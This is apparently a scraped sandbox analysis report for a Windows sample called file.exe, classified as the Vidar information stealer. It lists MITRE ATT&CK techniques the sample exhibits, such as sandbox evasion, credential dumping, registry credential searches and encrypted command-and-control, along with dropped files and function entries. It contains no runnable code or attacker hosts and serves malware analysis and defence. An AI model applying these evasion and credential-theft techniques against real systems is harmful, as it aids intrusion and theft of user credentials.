Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAFIDGCFHIEHJJJJECAKKJDBAF

C:\ProgramData\BAAFIJKK

C:\ProgramData\BFIDGHDB

C:\ProgramData\ECGDBAEHIJKKFHIEGCBGCAFIJJ

C:\ProgramData\EGIIJDHC

C:\ProgramData\EHIJDHCAKKFCBGCBAAEC

C:\ProgramData\GIJKKKFC

C:\ProgramData\IDHIIJJJKEGIDGCBAFIJ

C:\ProgramData\IDHIIJJJKEGI\freebl3.dll

C:\ProgramData\IDHIIJJJKEGI\mozglue.dll

C:\ProgramData\IDHIIJJJKEGI\msvcp140.dll

C:\ProgramData\IDHIIJJJKEGI\nss3.dll

Windows Analysis Report
file.exe

Function 0046D1B0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 273
registryCOMMON

Function 004F39CA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Function 004F3C13 Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre